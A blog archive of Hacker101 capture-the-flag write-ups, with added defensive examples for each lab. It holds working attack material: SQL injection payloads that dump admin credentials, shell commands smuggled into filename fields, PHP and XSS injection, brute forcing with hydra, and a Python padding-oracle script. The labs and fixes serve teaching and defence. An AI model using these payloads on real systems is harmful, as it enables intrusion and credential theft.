Category Archives: CTF Challenges

Write up Hacker101 – Petshop Pro

Flag 0

  • Burp Suite intercept: change the %3A+7.95%2C to %3A+0%2C and let it load.
  • Flag 0 found, this is easy!

Flag 1

  • Locating the admin interface login: off the top of my head I tried admin, Admin, ps-admin, login, and bingo, found /Login.
  • Used Repeater and dumped the username; GitHub is a good place to get a common usernames list.
  • Get a list for the passwords too; this will take a while. I used hydra for this task and built a script to dump the username and password. This one took about an hour.
  • Found the user/password combo and logged in.
  • Flag 1 found, brute force was the key here.

Flag 2

  • This one relied upon an XSS exploit, so you need to dump it as the user: go edit a product and add the following, <img src=x onerror=alert(1)>, in the name and description and hit save.
  • Add the product to the shopping cart and check out.
  • Flag 2 found during check out.
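
Flag 0 works because the price travels inside the client's form data (the %3A+7.95%2C fragment is the URL-encoded ": 7.95," of the cart) and the server trusts whatever comes back. An added example, not from the original post or from the Hacker101 challenge, of the defender-side fix: a checkout that recomputes the total from a server-side catalogue and only treats the client-sent price as a tamper signal to log. CATALOGUE, the product names and the prices are constructed for the example.

```python
from urllib.parse import unquote_plus

# Constructed server-side catalogue; the product names and prices are made up for this example.
CATALOGUE = {"Puppy": 7.95, "Kitten": 5.50}


def decode_form_fragment(fragment: str) -> str:
    """Decode a URL-encoded fragment of the submitted cart, e.g. the one edited in the write-up."""
    return unquote_plus(fragment)


def checkout(cart: list) -> dict:
    """Compute the amount to charge from CATALOGUE only.

    The client-supplied 'price' field is compared against the catalogue purely so the
    tampering can be logged; it never influences the total.
    """
    total = 0.0
    tampered = []
    for item in cart:
        name = item["name"]
        if name not in CATALOGUE:
            raise ValueError(f"unknown product {name!r}")
        qty = int(item.get("qty", 1))
        if qty < 1:
            raise ValueError("quantity must be positive")
        real_price = CATALOGUE[name]
        if "price" in item and abs(float(item["price"]) - real_price) > 0.005:
            tampered.append(name)  # client sent a different price: log it, do not honour it
        total += real_price * qty
    return {"total": round(total, 2), "tampered": tampered}
```

With this shape the intercepted request can say 0 all it likes; the charge comes from the catalogue and the mismatch ends up in a log line instead of a free puppy.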

 

Write up Hacker101 – Tickettastic Demo & Live instance.

Flag 0

  • Review the demo and take notes on how this is all set up.
  • View the live one now.
  • Demo and live look exactly the same, code-wise.
  • Admin login -> attempt admin / admin, but it shouldn't work.
  • Jump to submit a ticket and add in this information to inject some code and see if it works:
  • <a href="http://localhost/newUser?username=test&password=test&password2=test">TEST</a>
  • Now login with the new account.
  • Read the Flag won't work.
  • Flag 0 found

Flag 1

  • Use Burp Suite to find the request; we will focus on ticket?id=1 and dumping the admin login creds.
  • ticket?id=1' -> shows that it is running a MySQL database, but we got an error message; let's run down a quick list.
  • Let's try this one: ticket?id=1 AND 1=1 *this one works*, no flag though, but ticket?id=1 AND 1=2 does not.
  • Let's see if we can find the number of columns. ticket?id=1 AND 1=1 ORDER BY 10 does not work, but ticket?id=1 AND 1=1 ORDER BY 3 does. ticket?id=1 AND 1=1 ORDER BY 4 errors out. Sooo, let's UNION SELECT.
  • ticket?id=1.1 UNION SELECT 1,2,3-- shows the 1, 2, our reply, 3
  • Let's have some fun; let's see if we can drop the version of the database.
  • ticket?id=1.1 UNION SELECT VERSION(),DATABASE(),3--
  • Now let's get a table name.
  • ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()--
  • This should show 2 tables; the one we want is "users".
  • Let's drop the column names.
  • ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME='users'--
  • This will drop the id, username, password. Oh, we are close to admin now!
  • ticket?id=1.1 UNION SELECT 1,password,3 FROM users WHERE username='admin'--
  • Flag 1 found
  • I just learned something: we could have just done this the easier way.
  • Burp Suite > read the GET request, save that to a file and use sqlmap -r therequest.txt --dump

Write up Hacker101 – Postbook

Flag 0

  • Hint -> don't use common user / password combos
  • Signed in with user / password as both the user and password
  • Flag 0 found

Flag 1

  • As user, view the post.
  • index.php?page=view.php&id=1
  • Copy that and change the id to 2.
  • Flag 1 found

Flag 2

  • Create a new post; use Burp Suite from here,
  • and use intercept before creating a post: check and modify the user_id value="2" to value="1", release the intercept, and the web form posts as admin.
  • Flag 2 found

Flag 3

  • The hint gives a number to multiply: 189 * 5 = 945
  • Let's review 945
  • index.php?page=view.php&id=945
  • Flag 3 found

Flag 4

  • Use Burp's intercept again.
  • Edit the post and hit save; be sure to have intercept on so you can change id=3 to id=1.
  • Flag 4 found

Flag 5

  • Burp intercept; this time we are modifying cookies. You would need md5 to find out what the value for 1 is. You will need to logout and re-login as user and intercept that login so you can also snag that cookie.
  • Take the current cookie from Burp; it should be the cookie id and resolve to number 2 as the md5 value.
  • When you get the md5 value for 1, paste it in the interception area for Burp and release to change the cookie id value.
  • Flag 5 was found, as you have gone from user to admin.

Flag 6

  • Now let's intercept when you attempt to delete a post.
  • Again it uses md5 values when deleting posts, so change the value to 1's md5 value.
  • Flag 6 found; when you release it, it should drop another flag when you visit the post.
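
Flags 1 to 6 all come from the same two weaknesses: post ids and the user_id form field are taken from the client, and the session cookie is md5 of the user id, which anyone can compute. An added example, not from the original post, that shows why the cookie is forgeable and one standard-library way to close both holes: an HMAC-signed cookie (any change to the id invalidates the signature) and an ownership check before a post is edited or deleted. POSTS, SERVER_KEY and the function names are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constructed server-side signing key; a real app loads it from configuration.
SERVER_KEY = secrets.token_bytes(32)

# Constructed posts table: post id -> owner user id.
POSTS = {1: {"owner": 1, "title": "admin's post"}, 2: {"owner": 2, "title": "user's post"}}


def legacy_cookie(user_id: int) -> str:
    """The scheme the write-up describes: cookie = md5(user id), so anyone can compute it."""
    return hashlib.md5(str(user_id).encode()).hexdigest()


def signed_cookie(user_id: int, key: bytes = SERVER_KEY) -> str:
    """Cookie of the form '<id>.<hmac-sha256(id)>'; the id stays visible but cannot be changed."""
    mac = hmac.new(key, str(user_id).encode(), hashlib.sha256).hexdigest()
    return f"{user_id}.{mac}"


def user_from_cookie(cookie: str, key: bytes = SERVER_KEY):
    """Return the user id if the signature is valid, else None."""
    uid_str, sep, mac = cookie.partition(".")
    if not sep or not uid_str.isdigit():
        return None
    expected = hmac.new(key, uid_str.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):  # constant-time comparison
        return None
    return int(uid_str)


def can_modify(cookie: str, post_id: int) -> bool:
    """Authorization for edit/delete: the caller must be the post's owner.

    The user_id or id carried in the form is ignored; only the verified cookie
    and the stored owner decide.
    """
    uid = user_from_cookie(cookie)
    post = POSTS.get(post_id)
    return uid is not None and post is not None and post["owner"] == uid
```

The md5 cookie for user 1 is the same on every install, which is exactly what Flags 5 and 6 rely on; a keyed MAC keeps the id readable but makes the swap from 2 to 1 fail verification, and the ownership check stops the user_id and id edits from Flags 2 and 4 regardless of what Burp sends.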

 

Write up Hacker101 – Cody’s First Blog



Flag 0

  • Toooo much information was given on the first step. If you read it right, you have 2 red flags already: 1, it's PHP, and second, include(). Nothing wrong with PHP per se, just when you are first getting into it you make a lot of security mistakes.
  • XSS won't pass in here; tried, but it won't work here.
  • But if they didn't close a few commands in the backend, try to pass some PHP code in HTML format and see what you get.
  • i.e.: in the comments type <?php phpinfo()?>
  • Flag 0 found, geez that was too easy.

Flag 1

  • All CMS / blog systems have an admin interface; I mean, it's a way to control a blog content management system.
  • I used Burp Suite for this to investigate what goes where and what gets executed, and I found ?page=admin.auth.inc
  • Found user/password
  • Let's do something extremely silly, as this is "Cody's first blog" after all; let's see if he made a mistake: remove auth and use ?page=admin.inc
  • Flag 1 found

Flag 2

  • Using Burp Suite to see more of what gets passed through.
  • The idea for this one is to use PHP blind injection to read the index.php source.
  • Pop in this command; this took me a bit to find, as it's been a while since I've used PHP.
  • <?php echo readfile("index.php")?> in the comments, like in flag 0
  • Check the source (or use Burp to see the source).
  • Flag 2 found in the index.php source.

Write up Hacker101 – Photo Gallery

Flag 1)

  • Start off by viewing the source and you will get the ids.
  • So let's view fetch?id=1 and you should see a direct image.
  • Add a .1 to it, i.e. fetch?id=1.1, and it should error out.
  • But let's pass some SQL to push an arbitrary file read, using UNION SELECT 'file/adorable.jpg' --
  • This should drop the image information; pay good attention to it and you will find another hint that this is running uwsgi-nginx-flask-docker.
  • Change the filename from file/adorable to uwsgi.ini, as uwsgi will have an ini file for its config.
  • Learn the main file name from this config and use that instead of uwsgi.ini; i.e. it should show main.py.
  • Now review main.py.
  • Flag 0 found.

Flag 2)

  • This one is easy; if you use Slackware like I have and installed the source package, you will need to drop the image from sqlmap using a blind injection.
  • sqlmap -u usr/fetch?id=1 --dump
  • Flag 1 is found

Flag 3)

  • Using remote code execution, rename image 3 to a new name; call it test.
  • Command: fetch?id=1;UPDATE photos SET title='test' WHERE id=3;COMMIT;--
  • Broken image 3 is now named test.
  • Command 2: fetch?id=1;UPDATE photos SET filename='* || ls > test' WHERE id=3;COMMIT;--
  • This should now show after checking it again with fetch?id=1.1 UNION SELECT 'test' --
  • Command 3: fetch?id=1;UPDATE photos SET filename='* || env > test' WHERE id=3;COMMIT;--
  • Run this again: fetch?id=1.1 UNION SELECT 'test' --
  • All 3 flags are now found. Flag 2 is the last one.
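
Cody's First Blog (include() of the ?page= value) and the Photo Gallery (a filename column that ends up in a file read and, for flag 3, in a shell command) are the same root problem: a user-controlled string reaches the filesystem. An added example, not from the original post or from the challenge code, of the two checks that stop this in Python: an allowlist for a page parameter, so the request names a key and never a file, and a containment check that a requested filename resolves to a regular file strictly inside the gallery directory. The directory layout, ALLOWED_PAGES and the file contents built in demo() are constructed; the inputs exercised are the ones from the write-ups.

```python
import tempfile
from pathlib import Path

# Constructed allowlist for a ?page= style parameter: the request names a key, never a path.
ALLOWED_PAGES = {"home": "home.inc", "about": "about.inc"}


def resolve_page(page_param: str):
    """Return the file to include for ?page=..., or None when the name is not allowlisted."""
    return ALLOWED_PAGES.get(page_param)


def safe_read(base_dir: Path, filename: str):
    """Read a file only if it resolves to a regular file strictly inside base_dir.

    resolve() follows '..' and symlinks first, so 'files/../uwsgi.ini' is judged by
    where it lands, not by how it was spelled.  The name is never handed to a shell.
    """
    base = base_dir.resolve()
    target = (base / filename).resolve()
    if base not in target.parents or not target.is_file():
        return None
    return target.read_bytes()


def demo() -> dict:
    """Build a throwaway gallery layout and run the checks against the write-up's inputs."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "uwsgi.ini").write_text("[uwsgi]\nmodule = main\n")  # constructed config
        (root / "main.py").write_text("# constructed app source\n")
        files = root / "files"
        files.mkdir()
        (files / "adorable.jpg").write_bytes(b"\xff\xd8constructed-jpeg")
        return {
            "image": safe_read(files, "adorable.jpg"),        # legitimate gallery file
            "config": safe_read(files, "../uwsgi.ini"),       # escapes the gallery dir
            "source": safe_read(files, "../main.py"),         # escapes the gallery dir
            "absolute": safe_read(files, "/etc/passwd"),      # absolute path, outside base
            "shell": safe_read(files, "* || ls > test"),      # flag-3 style value: just not a file
            "page_ok": resolve_page("home"),
            "page_bad": resolve_page("admin.auth.inc"),
        }
```

If an external tool really has to see the file (an image resizer, say), pass the resolved path as one element of an argv list with shell disabled; the `* || ls > test` trick in flag 3 only works because the filename is interpolated into a shell string.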

Write up Hacker101 – Encrypted Pastebin

note: Keep in mind, I have had over 20+ years in cyber security, I started out as a blackhat in the golden age of insecure internet. I also ran Slackware Linux since 1998 as my main OS so this is a double challenge with Hacker101 and Doing it all from Slackware Linux (NO Kali Linux ewww.) 

This one needed attention, as it is both easy and yet hard.

A couple of things I've learned from this one: you have to focus on what this is actually vulnerable to... the CVE is there, so you have to keep that in mind; this isn't all about nostalgia.
Tools used here:

What do we know?

  • From the obvious, AES-128 CBC
  • Not SSL (https)
  • Doesn't get stored in a database
  • url/ dynamic directory / dynamic query?post=dynamic encrypted key.
  • 4 exploits are to be found here for 4 ^FLAGS^
  • Flag 1

This one is a given, the easiest of them all. Just delete a character in the encrypted key and it dumps the first flag, but it also dumps a lot of RICH information; I highly recommend always paying attention to detail.

  • Flag 2

First clue was the Incorrect padding; right off the bat we now know this is a POODLE attack or something similar. Thanks to Kali Linux I found PadBuster, which took care of this attack by decrypting the AES-128; that would also dump the key and the second flag.

  • Flag 3

This clue is to know about the padding oracle attack: the first one was to decrypt it via Cipher Block Chaining, this time I needed to decode it again with a stream, RC4 style. But... any tools I could find required an unencrypted key... so I had to build something that would cross over; this took hours of running flag 2 over and over and watching how the data is being decrypted. So, in thought, let's see if I can use the website to decode it for me.

My thought was {Flag: ^flag2^ id: x , key: dynamic key} a clue,
and b64d = lambda x: base64.decodestring(x.replace('~', '=').replace('!', '/').replace('-', '+')) was placed right there, oh heck; another clue I found was post = json.loads(decryptLink(postCt).decode('utf8')).

So, as I couldn't find a tool, I had to decode this in a streamlined fashion.
In Python, I wrote (test3):

import base64    # because base64
import requests  # using requests with web forms

# Decode the data: the site's own base64 alphabet swaps ~ ! - for = / +.
def decode(data):
    return base64.b64decode(data.replace('~', '=').replace('!', '/').replace('-', '+'))

# Re-encode the data the same way.
def encode(data):
    return base64.b64encode(data).decode('utf-8').replace('=', '~').replace('/', '!').replace('+', '-')

# Remember XOR: was a hint, so we need to use XOR, not decrypt it.
# So defining byte XOR.
def bxor(b1, b2):  # use xor for bytes
    result = b''
    for x, y in zip(b1, b2):
        result += bytes([x ^ y])
    return result

# Now define the padding check: the site answers with PaddingException when the padding is bad.
def test(url, data):
    r = requests.get(url + '?post={}'.format(data))
    if 'PaddingException' in r.text:
        return False
    else:
        return True

# Now define the IV candidates: all 256 values for the byte being worked on, in front of the known tail.
def generate_iv_list(tail):
    iv = b'\x00' * (16 - len(tail) - 1)
    return [iv + bytes([change]) + tail for change in range(0x00, 0xff + 1)]

# Last is the padding oracle itself: recover the block's intermediate state byte by byte,
# from the last byte (padding 0x01) to the first (padding 0x10), then XOR with the real IV.
def padding_oracle(real_iv, url, data):
    index = 15
    plains = bytes()   # intermediate bytes recovered so far
    tail = bytes()     # IV tail that makes the recovered bytes decrypt to valid padding
    while index >= 0:
        for iv in generate_iv_list(tail):
            if test(url, encode(iv + data)):
                plains = bytes([(16 - index) ^ iv[index]]) + plains
                index -= 1
                tail = bytes([plain ^ (16 - index) for plain in plains])
                break
    return bxor(real_iv, plains)

Now with some trial and error I came up with this.

post = 'original encrypted dynamic data'
data = decode(post)[16 * (1 + 5):]
iv_6 = decode(post)[16 * (1 + 4):16 * (1 + 5)]
immediate = bxor(b'$FLAG$", "id": "', iv_6)
iv = bxor(immediate, b'{"id":"1", "i":"')
print(encode(iv + data))

This dumped data, encrypted, but it was like in reverse, and when I used that in ?post= it dropped flag 3 with another error.

  • Flag 4

Now this one caught me: if they don't store data in a SQL database, that doesn't mean they don't use SQL for defining data.

So we need to basically brute force the decryption using their stuff, using a SQL injection. Here is what I wrote.

from Crypto.Util.Padding import pad   # PKCS#7 padding from pycryptodome; import not shown in the original post

# Not defined in the original post: recover the intermediate state of one block by running the
# padding oracle above with an all-zero "real IV", so the final XOR returns the intermediate itself.
def padding_oracle_decrypt(url, block):
    return padding_oracle(b'\x00' * 16, url, block)

if __name__ == '__main__':
    url = 'http://URL/Dynamic Folder/'
    post = 'Dynamic Encrypted Post'
    ciphertext = decode(post)[16 * 6:16 * 7]
    immediate = bxor(b'$FLAG$", "id": "', decode(post)[16 * (1 + 4):16 * (1 + 5)])

    plains = '{"id":"0 UNION SELECT group_concat(headers), \'\' from tracking","key":"Dynamic Enc Key"}'
    data = pad(plains.encode('utf-8'), 16)
    block_amount = int(len(data) / 16)
    index = block_amount
    # Work backwards: each chosen plaintext block XOR the next block's intermediate gives the block to prepend.
    while True:
        block = data[(index - 1) * 16: index * 16]
        print('meow:')
        print(block)
        iv = bxor(immediate, block)
        ciphertext = iv + ciphertext
        index -= 1
        if index > 0:
            immediate = padding_oracle_decrypt(url, iv)
        else:
            break
    print(encode(ciphertext))

This one threw me off because it dropped another key; this key dropped a new error that I didn't pick up until I kept running it a few times (each time took over an hour),
but the error also showed http://127.0.0.1/url/?post=Another Encrypted Data Dynamic Key.
So I took that new encrypted data key and it dropped Flag 1 and a new flag 4.
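
A padding oracle run is loud: for each of the 16 bytes of a block it sends up to 256 variants of the post parameter, and all but one of them trip the PaddingException that the test() function above keys on, which is why each run took over an hour. An added detection example, not from the original post, in Python with only the standard library: it parses access-log lines, groups requests per client IP, and flags a client whose requests carrying the post parameter are almost all distinct values and almost all errors. The log lines are constructed by make_burst() and BENIGN_LINES, and the assumption that a padding failure surfaces as an HTTP 5xx status is mine; in a real deployment the application's own exception log is the better source. The durable fix is authenticated encryption (AES-GCM, or encrypt-then-MAC with the tag checked before any decryption), which leaves no padding error to observe.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Common-log-format style line: ip - - [ts] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+'
)

# Constructed benign traffic: one real paste being viewed.
BENIGN_LINES = [
    '10.0.0.9 - - [12/Mar/2020:09:59:00 +0000] "GET /abc/?post=AAAAreal~ HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Mar/2020:09:59:30 +0000] "GET /abc/?post=AAAAreal~ HTTP/1.1" 200 512',
]


def make_burst(ip: str, positions: int, status_bad: str = "500") -> list:
    """Constructed log lines shaped like a padding-oracle run: for every byte position,
    256 variants of the post value, all but one of which fail the padding check."""
    lines = []
    for pos in range(positions):
        for guess in range(256):
            status = "200" if guess == 255 else status_bad
            token = f"AAAA{pos:02x}{guess:02x}~"  # made-up ciphertext token, unique per request
            lines.append(
                f'{ip} - - [12/Mar/2020:10:{pos:02d}:00 +0000] '
                f'"GET /abc/?post={token} HTTP/1.1" {status} 312'
            )
    return lines


def analyse(lines, param="post", min_requests=200, min_error_ratio=0.9):
    """Return {ip: stats} for clients whose traffic on `param` looks like an oracle run."""
    stats = defaultdict(lambda: {"requests": 0, "errors": 0, "values": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlparse(m["path"]).query)
        if param not in qs:
            continue
        s = stats[m["ip"]]
        s["requests"] += 1
        s["values"].add(qs[param][0])
        if m["status"].startswith("5"):  # assumption: padding failure answered with a 5xx
            s["errors"] += 1
    flagged = {}
    for ip, s in stats.items():
        if s["requests"] < min_requests:
            continue
        error_ratio = s["errors"] / s["requests"]
        distinct_ratio = len(s["values"]) / s["requests"]
        # Normal users re-open the same paste a handful of times; an oracle never repeats a value.
        if error_ratio >= min_error_ratio and distinct_ratio > 0.9:
            flagged[ip] = {"requests": s["requests"], "error_ratio": round(error_ratio, 3)}
    return flagged
```

The thresholds are deliberately coarse; the point is the shape of the signal, one client, thousands of unique ciphertexts, a 255-to-1 failure rate, not the exact numbers.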

Write up Hacker101- Micro-CMS v2


Let's turn up the heat.

You will need a few tools on this one; easiest if you are lazy like I am and don't want to re-invent the wheel.

Tools I played around with at first: you will need to get the database information, and to do that you need data, and a lot of it.... this is 2020, not 1999, so I don't need to set up squid or a proxy server to LOG everything I send in and out.... no way... I am running Slackware on a VM because I am streaming this live on twitch.tv. So what distro do people use these days, and I talk shit about? Kali Linux; I talk shit about it because of how easy it makes it for kids to get a hold of and do stuff without learning why. But like all Linux distros, you can get the source and compile it.

First tool I started with is mitmproxy, because they say this is a hard tool to use. But I beg to differ; this tool was 10x easier than setting up a squid proxy server and sifting through logs, and you can inject without modding the proxy server. But this is console based; I can sit for days sifting through features, as I am loving it.

I moved to Burp Suite because it's the same damn tool, just with more stuff, but it's all GUI based and.... icky Java! ewww.... anyways, I pick up on software easy, super easy, especially if it is GUI based; I am a hands-on person. I do the same thing, inject, and we can also decode / encode and other features and such... the only thing I really hate about this software is that it isn't fully open source and they charge money for other features, useless at least for me; I guess if you're some kid who got their degree in cyber security you might need it for corporate standards. Pretty much everything you can do in the free version of Burp you can also do in mitmproxy with mods.

SQLMap, now this console tool is fun to play with; it can dump tables, ids, and the content displayed inside, including decoding the basic encryption for the password field, but it is all just an automation of many different SQL injection flaws out there.

Back to this CMS system; it's a different setup but still same same.

  • Flag 1 – We have a login for editing or creating a new page, so this CMS's security has stepped up a bit. Ok, let's see if this is as easy as it has been; let's use admin / admin as the user/pass, or root/root, all showing unknown user. I accidentally hit ' and hit enter when guessing common user and password combos, but I got an error with this...

if cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')) == 0:
  File "/usr/local/lib/python2.7/site-packages/MySQLdb/cursors.py", line 255, in execute
    self.errorhandler(self, exc, value)
  File "/usr/local/lib/python2.7/site-packages/MySQLdb/connections.py", line 50, in defaulterrorhandler
    raise errorvalue
ProgrammingError: (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1")

Now there is something: they do use MySQL.. mm, and I broke it by accident with '
I have been working in SCCM a lot for the past few years, so knowing SQL commands is something.

So, let's craft a command, because this error tells me that I can execute a SQL command.
Username: ' UNION SELECT '111' AS password#
Password: 111
and I am in! Now click on a new link, "private page"; that page turns into your first flag.

  • Flag 2  Now let's use a tool, mitmproxy or Burp, whatever you want to see.
    I started to stream this in the past week, where I played with both and got this flag. What I was doing was seeing if I could intercept the forms and change the response. I ended up editing a page and letting both mitmproxy and Burp log the request, then resubmitting the request, turning a GET into a POST, and from there I got the second flag. This one was to show or demonstrate what interception with an MITM attack could do.
  • Flag 3  This one got me a bit, as I started to review both mitmproxy and Burp Suite to see what I could find, if I could find something.
    The hint I reviewed was "Credentials are secret, flags are secret. Coincidence?"
    So, I dug more and more into the requests back and forth, modifying both in and out of the requests, but only ended up with flag 2... including different ways to inject '1=1#, so at this point I needed a username and password. I loaded up SQLMap and let it dump the tables with the rows, and I ended up dumping a whole set of usernames and passwords; I used one of them, which got me flag number 3.
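
The traceback above shows the bug exactly: the username from the form is pasted into the SQL text with %, so a lone ' breaks the statement (the 1064 error) and a UNION clause becomes part of the query. The same class of bug is behind the ticket?id= injection in Tickettastic and the fetch?id= stacked queries in the Photo Gallery. An added example, not from the original post or from the Hacker101 code, that reproduces the vulnerable lookup against an in-memory SQLite table next to a parameterized version and shows the login outcome for each. The table contents and the stored password are constructed; the payload is the write-up's, with MariaDB's # comment written as -- so SQLite parses it.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed admins table in memory; the stored password is a made-up value."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admins VALUES ('admin', 'constructed-secret')")
    return conn


def stored_password_vulnerable(conn, username: str):
    # Same shape as the traceback in the write-up: the form value is pasted into the SQL text.
    # The .replace('%', '%%') only protects Python's % formatting; it does nothing for SQL.
    sql = "SELECT password FROM admins WHERE username='%s'" % username.replace('%', '%%')
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def stored_password_safe(conn, username: str):
    # The driver binds the value: quotes and UNION inside it are just characters of a username.
    row = conn.execute("SELECT password FROM admins WHERE username=?", (username,)).fetchone()
    return row[0] if row else None


def login(conn, username: str, password: str, safe: bool = True) -> bool:
    lookup = stored_password_safe if safe else stored_password_vulnerable
    try:
        stored = lookup(conn, username)
    except sqlite3.OperationalError:
        # Log it server-side; never echo the SQL error to the client as the CMS did.
        return False
    return stored is not None and stored == password


# The write-up's payload, with MariaDB's '#' comment written as '-- ' for SQLite.
UNION_PAYLOAD = "' UNION SELECT '111' AS password-- "


def demo() -> dict:
    """Exercise both lookups with the inputs from the write-up."""
    conn = make_db()
    try:
        stored_password_vulnerable(conn, "'")
        quote_error = False
    except sqlite3.OperationalError:
        quote_error = True  # the 1064-style syntax error the author hit by accident
    return {
        "quote_breaks_vulnerable": quote_error,
        "quote_breaks_safe": stored_password_safe(conn, "'") is None,
        "union_logs_in_vulnerable": login(conn, UNION_PAYLOAD, "111", safe=False),
        "union_logs_in_safe": login(conn, UNION_PAYLOAD, "111", safe=True),
        "real_admin_safe": login(conn, "admin", "constructed-secret"),
    }
```

In the vulnerable path the UNION row supplies the password the attacker is about to type, so the comparison passes without knowing any real credential; with the bound parameter the same string is simply a username that does not exist. The stored value should of course be a salted hash rather than the password itself, which is a separate fix from the injection.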

 

Write up Hacker101- Micro-CMS v1


Thoughts: Have you ever sat at a website and messed around with directories? or custom switches? or even crawled a website, like using wget -m, and mirrored everything, seeing a lot of directories and their randomness, and you stumble upon random stuff, and some stuff you really wished you hadn't, like porn, warez etc.. Well, I didn't use wget per se here, but I did mess around with this; not everything is linked.

This is a micro CMS, a lightweight content management system; typically every newbie web developer who wants to make a CMS starts here.

Note: hey, I helped develop one for my old ISP. Hey! this should be a walk in the park.

  • Flag 1, let's find it.
    – I started off by creating a new page to learn the system; now edit that page (keep an eye on the IDs given). Let's view that page, and let's change the id given (http://url/dynamic folder/page/Id). Assuming you were assigned, like I was, ID 9, change that to 8, and let's walk it down from 8 to 1 and view all these pages.

Note: One of these will show a Forbidden permission page. Remember that ID; for me it was ID 7.

Let's go back to your page and edit it; it should show (http://url/dynamic folder/page/edit/9). Now let's test the permissions of page 7, because remember, this is an exploitation of security, so let's break stuff, shall we? It should show: (http://url/dynamic folder/page/edit/7)

Found the Flag!

  • Flag 2

Let's add a character; this normally breaks stuff.

View page 1 (http://url/dynamic folder/page/1)
Add ' to the end of the 1 (http://url/dynamic folder/page/1'); now this should break the page.

Now edit page 1: (http://url/dynamic folder/page/edit/1)
Let's do it again: add ' to the end of page 1.
(http://url/dynamic folder/page/edit/1')
Instead of breaking, it dropped a flag!

  • Flag 3

Ok, this is something I've heard about for a while: cross site scripting.
-> As a heads up, check out this for more information: https://www.nuharborsecurity.com/alertxss-pwn3d-real-dangers-cross-site-scripting/

Edit page 1 and add a script snippet; this needs to use the Alert – XSS cross site scripting, or as I call it, the Alert X-Ass... (http://url/dynamic folder/page/edit/1)
Add in the title and body <script> Alert 'XSS'</script>
Now save it and hit "Go Back"

It should error out and give you Flag 3, as it did for me!

  • Flag 4

This is similar to Flag 3, but this one needs a bit of creativity.
Do you remember when I said find the ids and count down? You saw that adorable kitty on page 2 just like I did? (http://url/dynamic folder/page/2)

Let's edit this one! Since we have done ID 7 and 1; 8, 4, 3, 5, 6 are all dead and don't exist.
(http://url/dynamic folder/page/edit/2)

Note: Having been a web developer in the past, you know if you add things that could interfere, such as adding another script call; this one brought me back to the early days of GeoCities in the late 90s, as I wrote a page people went to that looped back this button.

Add in this command: <button onclick=alert(1)> Kitty Button, CLICK ME!!!! </button>
Hit save and click the button, and this alert should error out because, you know, bad JavaScript. Now check your dev tools (hint: F12); back in those days Netscape was the only browser that had this feature, but back then it didn't show a button flag, instead it used to display JavaScript errors or break the whole site, or, depending on how you coded your site, you could have looped that button click a lot of times instead. In the dev tools you will see the last flag^

Now we are getting nostalgic; this is how H101 got me hooked, with this nostalgia.
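
Flags 3 and 4 here, the <img onerror> in the Petshop product name, and the <a href> injected into a Tickettastic ticket all work for one reason: user-supplied text is written into the page as HTML. An added example, not from the original post, of the defender side in Python: escape each field for the HTML context it is rendered in, only turn validated http(s) URLs into links, and log submissions that contain script or event-handler markup so the attempt shows up even though it no longer executes. SUSPICIOUS, render_field, render_link, flag_submission and page_html are names chosen for the example.

```python
import html
import re

# Markup worth logging when it appears in user-supplied content (constructed pattern list).
SUSPICIOUS = re.compile(
    r"<\s*script\b|\bon[a-z]+\s*=|javascript\s*:|<\s*(?:img|a|button|iframe)\b", re.I
)


def render_field(value: str) -> str:
    """Escape for an HTML text context: <, >, & and quotes become entities, so the
    browser shows the markup instead of executing it."""
    return html.escape(value, quote=True)


def render_link(href: str, text: str) -> str:
    """Turn a user-supplied URL into a link only if it is http(s); escape both parts.
    Anything else (javascript:, data:, a bare tag) is rendered as plain text."""
    if not re.match(r"^https?://", href, re.I):
        return render_field(text)
    return f'<a href="{html.escape(href, quote=True)}">{render_field(text)}</a>'


def flag_submission(value: str) -> list:
    """Return the suspicious fragments found in a submission, for server-side logging."""
    return [m.group(0) for m in SUSPICIOUS.finditer(value)]


def page_html(title: str, body: str) -> str:
    """Render a CMS page; every field goes through render_field before it touches the template."""
    return f"<h1>{render_field(title)}</h1>\n<div>{render_field(body)}</div>"
```

Escaping on output is what makes the stored payloads harmless wherever they are shown later (the Petshop flag fires at checkout, not on the edit page); the logging hook is there because a product name containing onerror= is worth an alert on its own.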

Write up Hacker101- A little something to get you started



1/1 Complete.

Note: Being in web development for a good chunk of my life really shows here.

This one looks like a normal basic site, so this has to be easy. So I just view the source, and what do I see? A background image file, but it didn't change the background. Hmm? Let's open that file directly and take a peek.

And the image displays the ^flag^xxxxxx..